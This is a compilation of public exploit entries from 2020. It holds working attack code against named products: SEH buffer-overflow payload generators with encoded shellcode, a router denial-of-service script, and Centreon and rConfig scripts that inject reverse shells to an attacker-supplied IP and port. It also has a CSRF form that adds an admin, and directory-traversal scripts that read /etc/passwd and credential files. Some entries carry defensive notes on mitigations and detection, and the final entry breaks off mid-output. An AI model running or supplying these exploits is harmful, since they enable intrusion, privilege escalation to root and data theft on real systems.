-
10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click upon 'Add'
# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

# Proof-of-concept file generator: the script only writes "poc.txt"; the
# overflow is reached through the manual paste steps listed above.
# Defensive reading: the SEH handler address below lives in sqlite3.dll,
# which the author's mona annotation lists as shipped without SafeSEH, ASLR
# or rebase support. Rebuilding or replacing that module with /SAFESEH and
# /DYNAMICBASE (and enabling SEHOP on the host) removes the fixed handler
# address this layout relies on; the root fix is bounds-checking the
# 'Computer' field before copying it.
# NOTE(review): `buffer` concatenates str ("A" * 211) with bytes (nseh, buf),
# which only works under Python 2; Python 3 raises TypeError here.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
buf += b"\x31\x75\x65\x50\x41\x41"

# Both values are packed little-endian as 32-bit words ("<I").
nseh = struct.pack("<I", 0x909006EB)
seh = struct.pack("<I", 0x61E8497A)
# 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)

# Layout: 211 filler bytes, the two overwritten SEH-record words, 20 more
# filler bytes, the encoded payload, then 200 trailing 0xff bytes.
buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200

# Written in text mode with no error handling: a failed open/write raises.
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
-
10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Step to discover Unquoted Service Path: C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto # Service info: C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: srvInventoryWebServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : srvInventoryWebServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.
-
TP-Link Archer C50 3 - Denial of Service (PoC)
# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC) # Date: 2020-01-25 # Exploit Author: thewhiteh4t # Vendor Homepage: https://www.tp-link.com/ # Version: TP-Link Archer C50 v3 Build 171227 # Tested on: Arch Linux x64 # CVE: CVE-2020-9375 # Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html import time import socket ip = '192.168.0.1' port = 80 print('[+] IP : ' + ip) print('[+] Port : ' + str(port)) for i in range(2): time.sleep(1) try: print('[+] Initializing Socket...') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) print('[!] Connecting to target...') s.connect((ip, port)) header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip) header = header.encode() print('[!] Sending Request...') s.sendall(header) print('[!] Disconnecting Socket...') s.close() if i == 1: print('[-] Exploit Failed!') break except Exception as e: if 'Connection refused' in str(e): print('[+] Connection Refused...Exploit Successful!') break else: print('[-] Exploit Failed!') break
-
Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
# Date: 2020-03-25
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.centreon.com/
# Version: 19.10.8
# Tested on: CentOS
# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce
# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607

# Authenticated flow: log in with supplied credentials, save a storage
# configuration whose RRDdatabase_status_path value contains shell
# metacharacters, then request displayServiceStatus.php so the stored value
# is used. Defensive reading: a configuration path stored by an
# administrator must never be interpolated into a shell command; pass it as
# an argument without a shell (or escape it) and validate it as a path.
# The referenced pull request is where the vendor-side fix lives.
# NOTE(review): the usage message uses the Python 2 print statement while
# the rest of the file uses print(); this file is Python 2 only.

#!/usr/bin/python
import requests
import sys
import warnings
from bs4 import BeautifulSoup

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) < 6:
    print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

# One session keeps the login cookie across requests.
req = requests.session()

print("[+] Retrieving CSRF token...")
loginPage = req.get(url+"/index.php")
response = loginPage.text
s = BeautifulSoup(response, 'html.parser')
# Raises TypeError if no centreon_token input is present in the page.
centreon_token = s.find('input', {'name':'centreon_token'})['value']

login_creds = {
    "useralias": username,
    "password": password,
    "submitLogin": "Connect",
    "centreon_token": centreon_token
}

print("[+] Sendin login request...")
login = req.post(url+"/index.php", login_creds)

# Success is inferred from the absence of the word "incorrect" in the body.
if "incorrect" not in login.text:
    print("[+] Logged In, retrieving second token")
    page = url + "/main.get.php?p=50118"
    second_token_req = req.get(page)
    response = second_token_req.text
    s = BeautifulSoup(response, 'html.parser')
    second_token = s.find('input', {'name':'centreon_token'})['value']

    # Form fields for the storage options page; every value other than
    # RRDdatabase_status_path is a plain default-looking setting.
    # NOTE: the key "o" is listed twice; the second literal wins (same value).
    payload = {
        "RRDdatabase_path": "/var/lib/centreon/metrics/",
        "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
        "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",
        "reporting_retention": "365",
        "archive_retention": "31",
        "len_storage_mysql": "365",
        "len_storage_rrd": "180",
        "len_storage_downtimes": "0",
        "len_storage_comments": "0",
        "partitioning_retention": "365",
        "partitioning_retention_forward": "10",
        "cpartitioning_backup_directory": "/var/cache/centreon/backup",
        "audit_log_option": "1",
        "audit_log_retention": "0",
        "submitC": "Save",
        "gopt_id": "",
        "o": "storage",
        "o": "storage",
        "centreon_token": second_token,
    }

    print("[+] Sendin payload...")
    # Response is not checked; a rejected save goes unnoticed here.
    send_payload = req.post(page, payload)

    trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
    print("[+] Triggerring payload...")
    # Response is not checked either.
    trigger = req.get(trigger_url)
    print("[+] Check your listener !...")
else:
    print("[-] Wrong credentials")
    exit()
-
Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- If the 'Preferences' windows pops up, just click 'Cancel'
# 4.- Click 'Batch'
# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there
# 6.- Select OK
# 7.- Some Windows message boxes will pop up, click OK.
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/

# Proof-of-concept file generator: writes "poc.txt" only; the overflow is
# reached through the manual paste steps above.
# Defensive reading: the SEH handler address is taken from MSRMfilter03.dll,
# annotated below as lacking SafeSEH, ASLR and rebase support. Shipping that
# module with /SAFESEH and /DYNAMICBASE (plus SEHOP on the host) removes the
# fixed handler address; the root fix is bounding the 'Input:' field copy.
# NOTE(review): `buffer` mixes str and bytes, so this only runs on Python 2.

import struct
import sys

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
buf = b""
buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52"
buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65"
buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b"
buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72"
buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61"
buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66"
buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47"
buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72"
buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31"
buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e"
buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59"
buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c"
buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71"
buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33"
buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d"
buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74"
buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b"
buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75"
buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64"
buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53"
buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b"
buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c"
buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30"
buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58"
buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58"
buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45"
buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70"
buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62"
buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53"
buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75"
buf += b"\x35\x57\x70\x41\x41"

# Both values packed little-endian as 32-bit words ("<I").
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10025A2E)
# 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)

# Layout: 9008 filler bytes, the two overwritten SEH-record words, ten bytes
# of "\x41\x49" padding, the encoded payload, then 200 trailing 0xff bytes.
buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200

# Bare except: any failure (including KeyboardInterrupt) is reported as a
# file-creation error and the cause is lost.
try:
    f = open ("poc.txt", "w")
    f.write(buffer)
    f.close()
    print "[+] The file has been created successfully!"
except:
    print "[!] There has been an error while creating the file."
-
ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) # Product : ECK Hotel # Version : 1.0-beta # Date: 2020-03-26 # Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download # Exploit Author: Mustafa Emre Gül # Website: https://emregul.com.tr/ # Tested On : Win10 x64 # Description : Simple Hotel Management System. PoC: <!--Unauthenticated Create Admin User --> <html> <body> <form action="localhost/index.php?module=user/user-add" method="POST"> <input type="hidden" name="nama" value="meg" /> <input type="hidden" name="id_user_role" value="1" /> <input type="hidden" name="jabatan" value="meg" /> <input type="hidden" name="nomor_telp" value="1" /> <input type="hidden" name="username" value="meg" /> <input type="hidden" name="password" value="meg" /> <input type="hidden" name="user-add" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2020-03-24 # Software Link : http://www.lavalys.com/ # Tested Version: 5.50.2100 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Home Single Language # Steps to produce the crash: #1.- Run python code: Everest.py #2.- Open Everest.txt and copy content to clipboard #3.- Open "Everest Ultimate Edition" #4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo" #5.- In "Abrir Archivo" field paste Clipboard #6.- Select "Next" #7.- Crashed buffer = "\x41" * 450 f = open ("Everest.txt", "w") f.write(buffer) f.close()
-
Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal # Date: 2020-03-26 # Exploit Author: hongphukt # Vendor Homepage: https://www.jinfonet.com/ # Software Link: https://www.jinfonet.com/product/download-jreport/ # Version: JReport 15.6 # Tested on: Linux, Windows The Jreport help function has a path traversal vulnerability in the SendFileServlet that allows remote unauthenticated users to view any file on the operating system with the permissions of the application service user. This vulnerability affects Windows and Unix operating systems. Technical Details Before login, Jreport exposes a help function at the URL: https://serverip/jreport/sendfile/help/userguide/server/index.htm The sendfile URL is processed by the jet.server.servlets.SendFileServlet class. <servlet> <servlet-name>sendfile</servlet-name> <servlet-class>jet.server.servlets.SendFileServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>sendfile</servlet-name> <url-pattern>/sendfile/*</url-pattern> </servlet-mapping> In the jet.server.servlets.SendFileServlet class, the request proceeds when it is authenticated or when the URL starts with '/help/': if ((!isAuthentic) && (!path.startsWith("/help/"))) { httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm()); return; } The function then reads the file without any path validation. Exploit: Get the login properties or the /etc/passwd file via the URL: http://jreport.test/jreport/sendfile/help/../bin/login.properties http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd # Exploit Code import requests import argparse def exploit(url, file): session = requests.Session() rawBody = "\r\n" response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody) if response.status_code == 404: print("The '{}' file was not found.".format(file)) else: print("-" *22) print(response.content) print("-" *22) if __name__ == "__main__": parser =
argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download') parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL') parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download') args = parser.parse_args() exploit(args.url, args.file) # python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/" # python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties" # python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties"
-
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution # Exploit Author: vikingfr # Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) # Date: 2020-03-12 # CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 # Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) # Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Version: tested v3.9.4 # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 # # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # # Example : # $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 # rConfig - 3.9 - Unauthenticated root RCE # [+] Adding a temporary admin user... # [+] Authenticating as dywzxuvbah... # [+] Logged in successfully, triggering the payload... # [+] Check your listener ! # [+] The reverse shell seems to be opened :-) # [+] Removing the temporary admin user... # [+] Done. # # $ nc -nvlp 3334 # listening on [any] 3334 ... 
# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186
# sh: no job control in this shell
# sh-4.2# id
# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2#

# Flow of this script: (1) an unauthenticated GET to commands.inc.php whose
# searchField query string carries an INSERT into `users`; (2) a login as the
# inserted user; (3) an authenticated GET to ajaxArchiveFiles.php whose
# `path` parameter is a backtick-wrapped command; (4) a DELETE of the user
# through the same search parameter.
# Defensive reading / detection: the inserted row has a random 10-letter
# lowercase username, an email ending in "@domain.com", userlevel 9 and the
# literal timestamp 1346920339 — easy to flag in the `users` table or its
# binlog. Files /tmp/.<username>.txt and /tmp/.<username>.zip are left on
# disk, and sudo logs will show the web user running `zip -T -TT`.
# Mitigations: parameterized queries in commands.inc.php, no shell
# interpolation of `path` in ajaxArchiveFiles.php, and removing the web
# user's passwordless sudo rule for zip.

#!/usr/bin/python3
import requests
import sys
import urllib.parse
import string
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from requests.exceptions import Timeout

print ("rConfig - 3.9 - Unauthenticated root RCE")
if len(sys.argv) != 4:
    print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")
    exit()

target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"

def generateUsername(stringLength=8):
    """Return `stringLength` distinct lowercase ASCII letters in random order.

    Uses random.sample, so raises ValueError if stringLength > 26.
    """
    u= string.ascii_lowercase
    return ''.join(random.sample(u,stringLength))

print ("[+] Adding a temporary admin user...")
fake_id = str(random.randint(200,900))
fake_user = generateUsername(10)
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
userleveladmin = 9 # Administrator
# NOTE: userleveladmin is never used; the literal 9 is written into the
# payload string below.
addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
encoded_request = target+vuln_page+vuln_parameters+addUserPayload
firstrequest = requests.session()
# verify=False: TLS certificate validation is disabled for this request.
exploit_req = firstrequest.get(encoded_request,verify=False)

request = requests.session()
login_info = {
    "user": fake_user,
    "pass": "admin",
    "sublogin": 1
}
print ("[+] Authenticating as "+fake_user+"...")
login_request = request.post(
    target+"/lib/crud/userprocess.php",
    login_info,
    verify=False,
    allow_redirects=True
)
# Login success is judged by the dashboard status code (200 vs 302 below).
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)

if dashboard_request.status_code == 200:
    print ("[+] Logged in successfully, triggering the payload...")
    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
    print ("[+] Check your listener !")
    # A 10-second timeout is interpreted as the command still running
    # (i.e. a shell being held open); a normal response as "not executed".
    try:
        exploit_req = request.get(encoded_request,timeout=10)
    except Timeout:
        print('[+] The reverse shell seems to be opened :-)')
    else:
        print('[-] The command was not executed by the target or you forgot to open a listener...')
elif dashboard_request.status_code == 302:
    print ("[-] Wrong credentials !? Maybe admin were not added...")
    exit()

# Cleanup of the inserted row; only reached when the dashboard status was
# 200 or something other than 302.
print("[+] Removing the temporary admin user...")
delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"
encoded_request = target+vuln_page+vuln_parameters+delUserPayload
lastrequest = requests.session()
exploit_req = lastrequest.get(encoded_request,verify=False)
print ("[+] Done.")
-
Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2020-03-27 # Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/ # Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3 # Version : Odin Secure FTP Expert 7.6.3 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Home Single Language (ESP) Steps to Produce the Crash: 1.- Run python code: OdinSecureFTP.py 2.- Copy content to clipboard 3.- Open "OdinSecureFTPExpert.exe" 4.- Go to "Trial" > Connect > Quickconnect site 5.- Paste ClipBoard into all the fields 6.- Go to Connect 7.- Crashed Python "OdinSecureFTP" Code: buffer = "\x41" * 108 f = open ("OdinSecureFTP.txt", "w") f.write(buffer) f.close()
-
Joomla! com_fabrik 3.9.11 - Directory Traversal
# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal #Google Dork: inurl:"index.php?option=com_fabrik" #Date: 2020-03-30 #Exploit Author: qw3rTyTy #Vendor Homepage: https://fabrikar.com/ #Software Link: https://fabrikar.com/downloads #Version: 3.9 #Tested on: Debian/Nginx/Joomla! 3.9.11 ################################################################## #Vulnerability details ################################################################## File: fabrik_element/image/image.php Func: onAjax_files 394 public function onAjax_files() 395 { 396 $this->loadMeForAjax(); 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal. 398 399 if (!strstr($folder, JPATH_SITE)) 400 { 401 $folder = JPATH_SITE . '/' . $folder; 402 } 403 404 $pathA = JPath::clean($folder); 405 $folder = array(); 406 $files = array(); 407 $images = array(); 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders); 409 410 if (!array_key_exists('/', $images)) 411 { 412 $images['/'] = array(); 413 } 414 415 echo json_encode($images['/']); 416 } ################################################################## #PoC ################################################################## $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/" ...snip... [{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}] ...snip... $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/" ...snip... 
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 